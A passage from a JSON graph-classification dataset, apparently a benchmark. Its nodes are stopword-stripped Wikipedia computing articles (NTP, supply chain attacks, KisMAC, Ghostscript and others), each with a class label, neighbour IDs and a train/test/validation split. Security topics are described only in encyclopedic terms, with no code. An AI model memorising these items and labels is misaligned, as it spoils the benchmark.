      6651,
      3580,
      2558,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 10342,
    "label": 1,
    "text": "Microsoft_Query:microsoft query microsoft query visual method creating database queries using examples based text string name document list documents qbe system converts user input formal database query using structured query language sql backend allowing user perform powerful searches without explicitly compose sql without even needing know sql derived moshé m. zloof original query example qbe implemented mid-1970s ibm research centre yorktown new york context microsoft access qbe used introducing students database querying user-friendly database management system small businesses microsoft excel allows results qbe queries embedded spreadsheets",
    "neighbors": [
      7523,
      3556,
      10413,
      2901,
      11030,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10343,
    "label": 4,
    "text": "Capsa_(software):capsa software capsa name family packet analyzer developed colasoft network administrators monitor troubleshoot analyze wired wireless networks currently three editions available capsa enterprise edition capsa standard edition capsa free edition capsa enterprise edition flagship colasoft capsa packet analyzer family supports ethernet wlan networks performs real-time packet capturing analysis well supporting past-events analysis marketed tool enterprise network administrator help deal daily network work various kinds network problem maintain productive enterprise network capsa standard edition ethernet packet analyzer designed networking professionals small business network administrators marketed network tool network monitoring troubleshooting analyzing purposes capsa free edition freeware ethernet packet analyzer designed colasoft personal use marketed tool network geeks learn protocols packets networking related knowledge free charge personal family users network monitoring troubleshooting needs anyone download capsa free edition colasoft website legal noncommercial use",
    "neighbors": [
      9440,
      10788,
      1064,
      842,
      6797,
      7983,
      6013
    ],
    "mask": "Test"
  },
  {
    "node_id": 10344,
    "label": 5,
    "text": "Network_Time_Protocol:network time protocol network time protocol ntp networking protocol clock synchronization computer systems packet-switched variable-latency data networks operation since 1985 ntp one oldest internet protocols current use ntp designed david l. mills university delaware ntp intended synchronize participating computers within milliseconds coordinated universal time utc uses intersection algorithm modified version marzullo algorithm select accurate time servers designed mitigate effects variable network latency ntp usually maintain time within tens milliseconds public internet achieve better one millisecond accuracy local area networks ideal conditions asymmetric routes network congestion cause errors 100 ms protocol usually described terms client-server model easily used peer-to-peer relationships peers consider potential time source implementations send receive timestamps using user datagram protocol udp port number 123 also use broadcasting multicasting clients passively listen time updates initial round-trip calibrating exchange ntp supplies warning impending leap second adjustment information local time zones daylight saving time transmitted current protocol version 4 ntpv4 proposed standard documented backward compatible version 3 specified /small 1979 network time synchronization technology used possibly first public demonstration internet services running trans-atlantic satellite network national computer conference new york technology later described 1981 internet engineering note ien 173 public protocol developed documented technology first deployed local area network part hello routing protocol implemented fuzzball router experimental operating system used network prototyping ran many years related network tools available include daytime time protocols recording time events well icmp timestamp ip timestamp option complete synchronization systems although lacking ntp data analysis clock disciplining algorithms include unix daemon timed uses election algorithm appoint server clients digital time synchronization service dtss uses hierarchy servers similar ntp stratum model 1985 ntp version 0 ntpv0 implemented fuzzball unix ntp packet header round-trip delay offset calculations persisted ntpv4 documented despite relatively slow computers networks available time accuracy better 100 milliseconds usually obtained atlantic spanning links accuracy tens milliseconds ethernet networks 1988 much complete specification ntpv1 protocol associated algorithms published drew experimental results clock filter algorithm documented first version describe client-server peer-to-peer modes 1991 ntpv1 architecture protocol algorithms brought attention wider engineering community publication article david l. mills ieee transactions communications 1989 published defining ntpv2 means state machine pseudocode describe operation introduced management protocol cryptographic authentication scheme survived ntpv4 bulk algorithms era also largely survived ntpv4 1992 defined ntpv3 rfc included analysis sources error reference clock final client enabled calculation metric helps choose best server several candidates appear disagree broadcast mode introduced subsequent years new features added algorithm improvements made became apparent new protocol version required 2010 published containing proposed specification ntpv4 protocol significantly moved since 2014 updated rfc yet published following retirement mills university delaware reference implementation currently maintained open source project led harlan stenn ntp uses hierarchical semi-layered system time sources level hierarchy termed stratum assigned number starting zero reference clock top server synchronized stratum n server runs stratum n 1 number represents distance reference clock used prevent cyclical dependencies hierarchy stratum always indication quality reliability common find stratum 3 time sources higher quality stratum 2 time sources brief description strata 0 1 2 3 provided upper limit stratum 15 stratum 16 used indicate device unsynchronized ntp algorithms computer interact construct bellman-ford shortest-path spanning tree minimize accumulated round-trip delay stratum 1 servers clients addition stratum protocol able identify synchronization source server terms reference identifier refid 64-bit timestamps used ntp consist 32-bit part seconds 32-bit part fractional second giving time scale rolls every 2 seconds 136 years theoretical resolution 2 seconds 233 picoseconds ntp uses epoch january 1 1900 therefore first rollover occurs february 7 2036 ntpv4 introduces 128-bit date format 64 bits second 64 bits fractional-second most-significant 32-bits format era number resolves rollover ambiguity cases according mills 64-bit value fraction enough resolve amount time takes photon pass electron speed light 64-bit second value enough provide unambiguous time representation universe goes dim typical ntp client regularly polls one ntp servers client must compute time offset round-trip delay time offset θ difference absolute time two clocks defined round-trip delay δ values θ δ passed filters subjected statistical analysis outliers discarded estimate time offset derived best three remaining candidates clock frequency adjusted reduce offset gradually creating feedback loop accurate synchronization achieved incoming outgoing routes client server symmetrical nominal delay routes common nominal delay systematic bias exists half difference forward backward travel times ntp reference implementation along protocol continuously developed 20 years backwards compatibility maintained new features added contains several sensitive algorithms especially discipline clock misbehave synchronized servers use different algorithms software ported almost every computing platform including personal computers runs daemon called ntpd unix service windows reference clocks supported offsets filtered analysed way remote servers although usually polled frequently implementation audited 2017 finding numerous potential security issues simple network time protocol sntp less complex implementation ntp using protocol without requiring storage state extended periods time used embedded systems applications full ntp capability required microsoft windows versions since windows 2000 include windows time service w32time ability synchronize computer clock ntp server w32time originally implemented purpose kerberos version 5 authentication protocol required time within 5 minutes correct value prevent replay attacks version windows 2000 windows xp implements sntp violates several aspects ntp version 3 standard beginning windows server 2003 windows vista compliant implementation ntp included microsoft states w32time reliably maintain time synchronization one second accuracy higher accuracy desired microsoft recommends using newer version windows different ntp implementation windows 10 windows server 2016 support 1 ms time accuracy certain operating conditions 2004 henning brauer presented openntpd ntp implementation focus security encompassing privilege separated design whilst aimed closely simpler generic needs openbsd users also includes protocol security improvements whilst still compatible existing ntp servers originally designed openbsd portable version available made available package linux package repositories new ntp client ntimed started poul-henning kamp 2014 new implementation sponsored linux foundation replacement reference implementation determined easier write new implementation scratch fix existing issues large existing code base june 2015 official release done yet ntimed synchronize clocks reliably ntimed works debian freebsd remains ported windows macos ntpsec fork reference implementation systematically security-hardened fork point june 2015 response rash compromises 2014 first production release shipped october 2017 removal unsafe features removal support obsolete hardware removal support obsolete unix variants ntpsec able pare away 75 original codebase making remainder auditable 2017 audit code showed eight security issues including two present original reference implementation ntpsec suffer eight issues remained reference implementation chrony comes default red hat distributions available ubuntu repositories chrony aimed ordinary computers unstable go sleep mode intermittent connection internet chrony also designed virtual machines much unstable environment characterized low resource consumption cost supports ptp well ntp two main components chronyd daemon executed computer starts chronyc command line interface user configuration evaluated safe incidents advantage versatility code written scratch avoid complexity code chrony written gnu general public license version 2 created richard curnow 1997 others along time currently maintained miroslav lichvar development supported red hat software day leap second event ntpd receives notification either configuration file attached reference clock remote server requirement time must appear monotonically increasing leap second inserted sequence 23:59:59 23:59:60 00:00:00 although clock actually halted event processes query system time cause increase tiny amount preserving order events negative leap second ever become necessary would deleted sequence 23:59:58 00:00:00 skipping 23:59:59 alternative implementation called leap smearing consists introducing leap second incrementally period 24 hours noon noon utc time implementation used google internally public ntp servers amazon aws security problems identified reference implementation ntp codebase ones appeared 2009 cause significant concern protocol undergoing revision review entire history january 2011 security revisions ntp specification reports cert current codebase reference implementation undergoing security audits several sources several years known high-risk vulnerabilities current released software several security concerns arose late 2014 previously researchers became aware ntp servers susceptible man-in-the-middle attacks unless packets cryptographically signed authentication computational overhead involved make impractical busy servers particularly denial service attacks ntp message spoofing used move clocks client computers allow number attacks based bypassing cryptographic key expiration services affected fake ntp messages identified tls dnssec various caching schemes dns cache bgp bitcoin number persistent login schemes 2017 security audit three ntp implementations conducted behalf linux foundation core infrastructure initiative suggested ntp ntpsec problematic chrony security standpoint ntp used distributed denial service ddos attacks small query sent ntp server return address spoofed target address similar dns amplification attack server responds much larger reply allows attacker substantially increase amount data sent target avoid participating attack servers configured ignore external queries upgraded version 4.2.7p26 later stack-based buffer overflow exploit discovered patch available december 19 2014 includes ntp version 4 releases version 4.2.8 apple concerned enough used auto-update capability first time though recent versions macos case version 10.6.8 manual fixes server version normal client users turn automatic time updating system preferences date time implementation errors basic missing return statement routine lead unlimited access systems running versions ntp root daemon systems use root daemon bsd subject flaw",
    "neighbors": [
      10242,
      1541,
      1030,
      3592,
      8211,
      6681,
      6682,
      4638,
      10271,
      6689,
      9251,
      2085,
      7208,
      5166,
      7214,
      8238,
      562,
      1586,
      3637,
      7734,
      9269,
      11321,
      3133,
      4158,
      5181,
      2112,
      6723,
      8260,
      11332,
      8265,
      1101,
      4687,
      11345,
      9306,
      10341,
      3695,
      4723,
      2679,
      4729,
      5251,
      9860,
      649,
      9868,
      6797,
      3218,
      9365,
      11413,
      152,
      2206,
      3742,
      9380,
      9381,
      3751,
      3752,
      7337,
      172,
      10924,
      6318,
      6319,
      9909,
      4793,
      7865,
      4797,
      702,
      8386,
      7364,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      1775,
      8432,
      8946,
      5875,
      9455,
      10484,
      3322,
      8956,
      4863,
      9987,
      3847,
      1297,
      10005,
      5402,
      5405,
      9511,
      4396,
      7984,
      10035,
      6456,
      1849,
      2362,
      8504,
      10748,
      829,
      5437,
      11579,
      2373,
      2887,
      4423,
      10058,
      849,
      5457,
      5970,
      1876,
      6993,
      9557,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      871,
      11112,
      361,
      2409,
      367,
      891,
      6524,
      2431,
      11647,
      2947,
      10115,
      11147,
      6541,
      8080,
      7570,
      11158,
      4505,
      5531,
      1436,
      10144,
      10659,
      933,
      2983,
      4011,
      6577,
      2996,
      11188,
      10171,
      3006,
      8640,
      9670,
      2509,
      4562,
      6098,
      1501,
      8669,
      8670,
      10723,
      5093,
      10727,
      4074,
      3564,
      5102,
      8694,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10345,
    "label": 9,
    "text": "Measuring_programming_language_popularity:measuring programming language popularity difficult determine programming languages widely used usage means varies context one language may occupy greater number programmer hours different one lines code third may utilize cpu time languages popular particular kinds applications example cobol still strong corporate data center often large mainframes fortran computational science engineering c embedded applications operating systems languages regularly used write many different kinds applications various methods measuring language popularity subject different bias measured proposed several indices published",
    "neighbors": [
      11009,
      8262,
      3462,
      5677,
      11219,
      11221,
      3960,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10346,
    "label": 4,
    "text": "KisMAC:kismac kismac wireless network discovery tool mac os x wide range features similar kismet linux/bsd namesake program geared toward network security professionals novice-friendly similar applications distributed gnu general public license kismac free software kismac scan networks passively supported cards including apple airport airport extreme many third-party cards actively card supported mac os x cracking wep wpa keys brute force exploiting flaws weak scheduling badly generated keys supported card capable monitor mode used packet reinjection done supported card prism2 ralink cards gps mapping performed nmea compatible gps receiver attached kismac2 fork original software new gui new features works os x 10.7 10.10 64-bit longer maintained data also saved pcap format loaded programs wireshark project created led michael rossberg july 27 2007 removed project due changes german law specifically stgb section 202c prohibits production distribution security software date project lead passed geoffrey kruse maintainer kismac since 2003 active developer since 2001 kismac longer actively developed primary development relocated kismac web site offline september 2016 august 6 2007 former homepage denounces new german law kismac2 project continue development longer maintained well",
    "neighbors": [
      4580,
      10788,
      584,
      842,
      7983,
      2006,
      823,
      7222,
      10329,
      8922,
      10332,
      9151
    ],
    "mask": "None"
  },
  {
    "node_id": 10347,
    "label": 9,
    "text": "STklos:stklos stklos scheme implementation succeeded stk interpreter based ad hoc virtual machine aims fast well light addition implementing rrs stklos supports additional libraries available package system scmpkg",
    "neighbors": [
      10083,
      8262,
      1799,
      5612,
      7983,
      9875,
      9877
    ],
    "mask": "Test"
  },
  {
    "node_id": 10348,
    "label": 4,
    "text": "Supply_chain_attack:supply chain attack supply chain attack cyber-attack seeks damage organization targeting less-secure elements supply network supply chain attack occur industry financial sector oil industry government sector cybercriminals typically tamper manufacturing process product installing rootkit hardware-based spying components internet security threat report powered symantec stated supply chain attacks still continues feature threat landscape increase 78 percent 2018 recent target security breach eastern european atm malware well stuxnet computer worm examples supply chain attacks supply chain management experts recommend strict control institution supply network order prevent potential damage cybercriminals supply chain system activities involved handling distributing manufacturing processing goods order move resources vendor hands final consumer supply chain complex network interconnected players governed supply demand although supply chain attack broad term without universally agreed upon definition reference cyber-security supply chain attack involves physically tampering electronics computers atms power systems factory data networks order install undetectable malware purpose bringing harm player supply chain network general sense supply chain attack may necessarily involve electronics 2010 burglars gained access pharmaceutical giant eli lilly supply warehouse drilling hole roof loading 80 million worth prescription drugs truck could also said carry supply chain attack however article discuss cyber attacks physical supply networks rely technology hence supply chain attack method used cyber-criminals generally supply chain attacks information systems begin advanced persistent threat determines member supply network weakest cyber security order affect target organization according investigation produced verizon enterprise 92 cyber security incidents analyzed survey occurred among small firms apt often gain access sensitive information physically tampering production product october 2008 european law-enforcement officials uncovered highly sophisticated credit-card fraud ring stole customer account details using untraceable devices inserted credit-card readers made china gain access account information make repeated bank withdrawals internet purchases amounting estimated 100 million losses threat supply chain attack poses significant risk modern day organizations attacks solely limited information technology sector supply chain attacks affect oil industry large retailers pharmaceutical sector virtually industry complex supply network information security forum explains risk derived supply chain attacks due information sharing suppliers states sharing information suppliers essential supply chain function yet also creates risk ... information compromised supply chain damaging compromised within organization muhammad ali nasir national university emerging sciences associates above-mentioned risk wider trend globalization stating …due globalization decentralization outsourcing supply chains numbers exposure points also increased greater number entities involved scattered around globe… cyber-attack supply chain destructive way damage many linked entities due ripple effect poorly managed supply chain management systems become significant hazards cyber attacks lead loss sensitive customer information disruption manufacturing process could damage company reputation wired reported connecting thread recent software supply chain attacks 05.03.19 surmised spread infected pirated popular compilers posted pirate websites corrupted versions apple xcode microsoft visual studio end 2013 target us retailer hit one largest data breaches history retail industry november 27 december 15 2013 target american brick-and-mortars stores experienced data hack around 40 million customers credit debit cards became susceptible fraud malware introduced pos system 1,800 stores data breach target customer information saw direct impact company profit fell 46 percent fourth quarter 2013 six months prior company began installing 1.6 million cyber security system target team security specialists monitor computers constantly nonetheless supply chain attack circumvented security measures believed cyber criminals infiltrated third party supplier gain access target main data network although officially confirmed investigation officials suspect hackers first broke target network november 15 2013 using passcode credentials stolen fazio mechanical services pennsylvania-based provider hvac systems 90 lawsuits filed target customers carelessness compensatory damages target spent around 61 million responding breach according fourth-quarter report investors believed american-israeli cyber weapon stuxnet malicious computer worm worm specifically targets systems automate electromechanical processes used control machinery factory assembly lines equipment separating nuclear material computer worm said specifically developed order damage potential uranium enrichment programs government iran kevin hogan senior director security response symantec reported majority infected systems stuxnet worm located islamic republic iran led speculation may deliberately targeting high-value infrastructure country including either bushehr nuclear power plant natanz nuclear power plant stuxnet typically introduced supply network via infected usb flash drive persons physical access system worm travels across cyber network scanning software computers controlling programmable logic controller plc stuxnet introduces infected rootkit onto plc modifying codes giving unexpected commands plc returning loop normal operation value feedback users recent years malware known suceful plotus tyupkin greendispense affected automated teller machines globally especially russia ukraine greendispenser specifically gives attackers ability walk infected atm system remove cash vault installed greendispenser may display ‘ service ’ message atm attackers right access credentials drain atm cash vault remove malware system using untraceable delete process types malware usually behave similar fashion capturing magnetic stripe data machine memory storage instructing machines withdraw cash attacks require person insider access atm technician anyone else key machine place malware atm tyupkin malware active march 2014 50 atms banking institutions eastern europe believed also spread time u.s. india china malware affects atms major manufacturers running microsoft windows 32-bit operating systems malware displays information much money available every machine allows attacker withdraw 40 notes selected cassette atm spring 2017 core code financial package m.e.doc used ukraine infected notpetya virus subsequently download subscribers hack carried provider system either hacking code provider hack re-routing download requests another server press reports time make clear supply chain attack attack vector used specified august september 2018 british airways website payment section contained code harvested customer payment data injected code written specifically route credit card information website domain baways.com could erroneously thought belong british airways comprehensive national cybersecurity initiative cyberspace policy review passed bush obama administrations respectively direct u.s. federal funding development multi-pronged approaches global supply chain risk management according adrian davis technology innovation management review securing organizations supply chain attacks begins building cyber-resilient systems supply chain resilience according supply chain risk management expert donal walters ability supply chain cope unexpected disturbances one characteristics company-wide recognition supply chain susceptible infiltration supply chain management plays crucial role creating effective supply chain resilience march 2015 conservative liberal democratic government coalition uk department business outlined new efforts protect smes cyber attacks included measures improve supply chain resilience uk government produced cyber essentials scheme trains firms good practices protect supply chain overall cyber security depository trust clearing group american post-trade company operations implemented governance vulnerability management throughout supply chain looks security along entire development lifecycle includes software coded hardware manufactured 2014 pwc report titled threat smart building cyber resilient financial institution financial services firm recommends following approach mitigating cyber attack avoid potential damage financial institution ’ bottom line reputation brand intellectual property executive team needs take ownership cyber risk specifically collaborate front understand institution defend respond cyber risks take make organization cyber resilient fireeye us network security company provides automated threat forensics dynamic malware protection advanced cyber threats advanced persistent threats spear phishing recommends firms certain principles place create resilience supply chain include april 27 2015 sergey lozhkin senior security researcher great kaspersky lab spoke importance managing risk targeted attacks cyber-espionage campaigns conference cyber security stated mitigation strategies advanced threats include security policies education network security comprehensive system administration specialized security solutions like ... software patching features application control whitelisting default deny mode",
    "neighbors": [
      7809,
      9569,
      3843,
      11561,
      971,
      7117,
      8978,
      11186,
      2041,
      5563,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 10349,
    "label": 4,
    "text": "CommView:commview commview application network monitoring packet analysis decoding two editions commview standard edition ethernet networks wireless edition 802.11 networks named commview wifi application runs microsoft windows developed tamosoft privately held new zealand company founded 1998 commview puts network adapter promiscuous mode captures network traffic also supports capturing packets dial-up virtual adapters e.g adsl 3g modems well capturing loopback traffic captured traffic analyzed application displays network statistics individual packets packets decoded using protocol decoder commview wifi puts wi-fi adapters monitor mode providing functionality user experience similar commview addition wlan-specific features displaying decoding management control frames indication signal noise level per-node per-channel statistics",
    "neighbors": [
      9440,
      4580,
      10788,
      1064,
      2569,
      10924,
      6797,
      7407,
      7983,
      11413,
      2006,
      10329,
      10271
    ],
    "mask": "Train"
  },
  {
    "node_id": 10350,
    "label": 7,
    "text": "Gale_Technologies:gale technologies gale technologies formerly known lumenare networks private company headquartered santa clara ca additional offices asia backed crescendo ventures company automates companies infrastructure delivering private hybrid cloud management orchestration software also sells management solutions converged infrastructure deployments 2008 july — lumenare networks formed includes acquired intellectual property two companies quikcycle edentree technologies later renamed gale technologies 2010 2012 march — gale technologies completes acquisition virtiv technology intellectual property 2012 16 nov — dell announces acquisition gale technologies",
    "neighbors": [
      1400
    ],
    "mask": "Test"
  },
  {
    "node_id": 10351,
    "label": 3,
    "text": "MOS_Technology_6509:mos technology 6509 mos technology 6509 enhanced version popular 6502 microprocessor capable addressing 1 megabyte ram via bank switching numerous 6502-based processors could bank switching via separate logic 6509 logic on-chip 6509 reputation difficult program due bank switching scheme never fared well used ill-fated commodore cbm-ii line computers",
    "neighbors": [
      11395,
      10767,
      664,
      10784,
      4385,
      7589,
      11054,
      3010,
      2383,
      3157,
      6485,
      10969,
      9563,
      5862,
      1776,
      5617,
      7281,
      7282,
      7284
    ],
    "mask": "Test"
  },
  {
    "node_id": 10352,
    "label": 9,
    "text": "Ghostscript:ghostscript ghostscript suite software based interpreter adobe systems postscript portable document format pdf page description languages main purposes rasterization rendering page description language files display printing document pages conversion postscript pdf files ghostscript used raster image processor rip raster computer printers—for instance input filter line printer daemon—or rip engine behind postscript pdf viewers ghostscript also used file format converter postscript pdf converter codice_1 conversion program comes ghostscript distribution described documentation work-alike nearly functionality user interface adobe acrobat distiller product converter basically thin wrapper around ghostscript codice_2 output device supports pdf/a-1 pdf/a-2 well pdf/x-3 output ghostscript also serve back-end pdf raster image png tiff jpeg etc converter often combined postscript printer driver virtual printer pdf creators takes form language interpreter ghostscript also used general purpose programming environment ghostscript ported many operating systems including unix-like systems classic mac os openvms microsoft windows plan 9 ms-dos freedos os/2 atari tos amigaos ghostscript originally written l. peter deutsch gnu project released gnu general public license 1986 later deutsch formed aladdin enterprises dual-license ghostscript also proprietary license development fork aladdin ghostscript aladdin free public license despite name free software license forbids commercial distribution gnu ghostscript distributed gnu general public license version 8.54 2006 development branches merged dual-licensed releases still provided ghostscript currently owned artifex software maintained artifex software employees worldwide user community according artifex version 9.03 commercial version ghostscript longer freely distributed commercial purposes without purchasing license though gpl variant allows commercial distribution provided code using released gpl artifex point view aggregated software challenged court mupdf february 2013 ghostscript changed license gplv3 gnu agpl version 9.07 raised license compatibility questions example debian ghostscript guis view postscript pdf files screens scroll page forward page backward zoom text print page several sets free fonts supplied ghostscript intended metrically compatible common fonts attached postscript standard include ghostscript fonts developed postscript type 1 format converted truetype format usable current software popularly used within open-source community garamond font additionally improved upon urw core 35 fonts subsequently incorporated gnu freefont tex gyre",
    "neighbors": [
      6915,
      10885,
      3974,
      6797,
      5397,
      2462,
      1822,
      11297,
      2978,
      4002,
      292,
      6436,
      1191,
      10536,
      6830,
      7983,
      1073,
      8627,
      8628,
      3126,
      8763,
      9790,
      576,
      73,
      7626,
      9166,
      1877,
      9192,
      9320,
      8426,
      5612,
      2798,
      2290,
      9714,
      5492,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10353,
    "label": 2,
    "text": "Blazor:blazor blazor web ui framework based c razor html runs browser via webassembly blazor designed simplify task building single-page applications run browser enables web developers write .net-based web apps run client-side web browsers using open web standards blazor released apache 2 open source license part .net core 3.0 code written c visualbasic.net compiled normal .net assemblies downloaded run web browser using webassembly based .net runtime runtime compiled webassembly .net assemblies created user code interpreted runtime current implementation rather slow ahead time compiler may added later development stage",
    "neighbors": [
      482,
      3462,
      2474,
      10284,
      7983,
      11221
    ],
    "mask": "None"
  },
  {
    "node_id": 10354,
    "label": 5,
    "text": "IPoE:ipoe internet protocol ethernet ipoe method delivering ip payload ethernet-based access network access network using bridged ethernet asynchronous transfer mode atm without using pppoe directly encapsulates ip datagrams ethernet frames using standard encapsulation use ipoe addresses disadvantage ppp unsuited multicast delivery multiple users typically ipoe uses dynamic host configuration protocol extensible authentication protocol provide functionality pppoe less robust manner",
    "neighbors": [
      5472,
      2996
    ],
    "mask": "Test"
  },
  {
    "node_id": 10355,
    "label": 8,
    "text": "Microsoft_adCenter_Analytics:microsoft adcenter analytics microsoft adcenter analytics codenamed gatineau microsoft web analytics solution 2006 microsoft acquired deepmetrix corporation used analytics technology deliver adcenter analytics competed google analytics tied microsoft adcenter way google tied google analytics google adwords led complaints webmasters due five dollar fee sign compared lack cost use google analytics features included march 2009 microsoft announced adcenter analytics would discontinued existing accounts would operational till end 2009",
    "neighbors": [
      6576,
      5524,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 10356,
    "label": 3,
    "text": "TIM-100:tim-100 tim-100 ptt teller microcomputer developed mihajlo pupin institute serbia 1985 ref.lit 1 based intel microprocessors types 80x86 vlsi circuitry ram capacity max.8mb external memory floppy disks 5.25 3.50 inch ref.literature 2 3 4 multiuser multitasking operating system real-time nrt also tranos developed ptt office fig.4 tim designers m.p.institute-belgrade wikimedia",
    "neighbors": [
      9606,
      6859,
      10635,
      7983,
      7665
    ],
    "mask": "Test"
  },
  {
    "node_id": 10357,
    "label": 3,
    "text": "Macintosh_Classic_II:macintosh classic ii macintosh classic ii also sold performa 200 personal computer designed manufactured sold apple computer inc. october 1991 september 1993 like macintosh se/30 replaces classic ii powered 16 mhz motorola 68030 cpu 40 80 mb hard disk contrast predecessor limited 16-bit data bus se/30 32-bit data bus 10 mb memory ceiling slower data bus resulted classic ii 30 slower se/30 classic ii shares case earlier classic architecturally similar macintosh lc use custom ics identical used lc enabled classic ii lower component count older macs unlike lc se/30 classic ii internal processor direct slot making first slotless desktop macintosh since macintosh plus classic ii one three machines apple repackaged macintosh performa brand introduced september 1992 called performa 200 sold specifications original classic ii addition speaker grille left side enhanced sound number changes packaged software included ease desktop alternative aimed provide simpler user interface standard macintosh finder exact software included tended vary one retailer next initially offered retail price 1,250 usd classic ii last black-and-white compact macintosh last desktop macintosh include external floppy disk drive port apple discontinued support classic ii january 1 2001 processor 16 mhz 15.6672 mhz motorola 68030 32-bit internally 16-bit bus optional motorola 68882 fpu ram 2 mb expandable 10 mb using two 100 ns 30-pin simms display 9 b w screen 512 x 342 pixels audio 8-bit mono 22khz hard drive 40 80 mb floppy 1.4 mb double sided addressing 24-bit 32-bit battery 3.6 v lithium expansion connectors rear panel include adb port keyboard mouse two mini-din-8 rs-422 serial ports db-25 scsi db-19 external floppy drive two 3.5 mm minijack audio sockets audio headphone classic ii 50-pin internal expansion slot intended either fpu co-processor additional rom socket designed used purpose suitable use general expansion slot apple never produced expansion card kind slot although least one third-party fpu available fastmath classic ii applied engineering sonnet offered synchronous 16mhz asynchronous 50mhz 68882 fpu 2016 group hobbyists 68k mac liberation army forums produced expansion card sockets fpu bootable rewriteable rom",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7335,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      5520,
      1428,
      3483,
      2979,
      11171,
      8109,
      1461,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      10224,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 10358,
    "label": 4,
    "text": "Data_architect:data architect data architect practitioner data architecture data management discipline concerned designing creating deploying managing organization data architecture data architects define data stored consumed integrated managed different data entities systems well applications using processing data way closely allied business architecture considered one four domains enterprise architecture according data management body knowledge data architect “ provides standard common business vocabulary expresses strategic data requirements outlines high level integrated designs meet requirements aligns enterprise strategy related business architecture. ” according open group architecture framework togaf data architect expected set data architecture principles create models data enable implementation intended business architecture create diagrams showing key data entities create inventory data needed implement architecture vision bob lambert describes necessary skills data architect follows",
    "neighbors": [
      7523
    ],
    "mask": "Test"
  },
  {
    "node_id": 10359,
    "label": 3,
    "text": "Sound_Blaster_Live!:sound blaster live sound blaster live pci add-on sound card creative technology limited pcs moving isa pci allowed card dispense onboard memory storing digital samples computer main memory accessing real time bus allowed much wider selection longer playing samples also included higher quality sound output levels quadrophonic output new midi synthesizer 64 sampled voices live introduced august 1998 variations design remained creative primary sound card line 2000s sound blaster live august 1998 saw introduction emu10k1 audio processor manufactured 0.35µm 3-metal-layer cmos process 2.44 million transistor asic rated 1000 mips emu10k1 featured hardware acceleration directsound eax 1.0 2.0 environmental audio extensions along high-quality 64-voice midi sample-based synthesizer integrated fx8010 dsp chip real-time digital audio effects major design change predecessor emu8000 emu10k1 used system memory accessed pci bus wavetable samples rather using expensive on-board memory possible point systems equipped far ram previously pci offered far faster efficient data transfer old isa bus integrated fx8010 32-bit programmable processor 1 kilobyte instruction memory provided real-time postprocessing effects reverb flanging chorus capability let users select pre-defined listening environment control-panel application concert hall theater headphones etc also provided hardware-acceleration eax creative environmental audio technology effect algorithms created development system integrated microsoft developer studio effects written language similar c compiled native fx8010 object code compiler fxasm sound blaster live featured higher audio quality previous sound blasters processed sound digitally every stage greater chip integration reduced analog signal losses older larger cards unfortunately digital processing brought limitations dsp internal fixed sample rate 48 khz standard ac'97 clock meaning emu10k1 always captured external audio-sources 48 khz performed sample-rate conversion 48 khz waveform output requested target rate 44.1 khz 32 khz rate-conversion step introduced intermodulation distortion downsampled output however rate-conversion applied audio signal passed effects engine sb/live great difficulty resampling audio-cd source material 44.1 khz without introducing audible distortion creative addressed concern recommending audio-recording performed exclusively 48 khz use third-party software handle desired sample-rate conversion avoid using emu10k1 sample-rate conversion sound blaster live supported multi-speaker output initially 4-speaker setup software referred 4.1 setup meaning 4 satellites subwoofer case subwoofer separate output 5.1 higher audio instead low-pass filter crossover within speaker system removes high midrange frequencies sound card output subwoofer games see 4.1 speaker system quadraphonic directsound offers subwoofer output configuration limited creative sound cards aureal ensoniq philips manufacturers made cards use four-speaker output fashion later versions live usually called live 5.1 offered 5.1-channel support adds center-channel speaker lfe subwoofer output useful movie watching dolby digital 5.1 decoded live implemented dos legacy support via ensoniq audiopci dos tsr program creative acquired ensoniq 1998 part deal made use highly-compatible isa sound card emulator newer cards fact live uses .ecw ensoniq concert wavetable files wavetable emulation dos program enables support many standards sound blaster 16 general midi adlib opl3 among others sound blaster live first sound card creative u hear recording input channel supported windows drivers additional software needed utilize analog stereo audio signal came main line directed input way one could mix available inputs midi synth one stereo signal using u hear 5.1 sound sound would downmixed stereo first creative recorder utility included sound card specifically designed take advantage u hear feature making simple matter capture streaming sound source even programs deliberately avoid providing means saving digital sounds thus freeing non-technical users complexities patching inputs outputs various software modules original sb live low noise floor time however critical design flaw limited application quadraphonic audio two s/p-dif channels provided stereo pair differed digital analog reconstruction since ac'97 chip provided internal 48 khz dac creative chose implement two identical dac pipelines front-speaker audio pair subjected different reconstruction amplification regime rear channel evidenced differently valued pull-up resistors filter-capacitors area forward ac'97 chip specifications ac'97 use different amplifier op-amps rear channel serviced separate arguably better philips uda1334 dac yet op-amp used boost signal output levels noticeably different frequency response envelope normalized front channel leaving thin quiet rear channel make matters worse rear channel op-amp inverting variety without treated leaving rear speakers phase front requiring switchover problems encountered using gold editions daughterboard 4-speaker digital-output tendency ac'97 chip fail used input source medium-impedance musical instruments removed use front channels altogether although chip could sourced cheaper ac'97 compatible products soldered place nevertheless simply redirecting front signal rear output sb live long time favorite trick computer audio enthusiasts want better sound minimum money despite problems original sb live still used well s/p-dif input/output midi input/output device network-connected digital audio workstation environments live live value 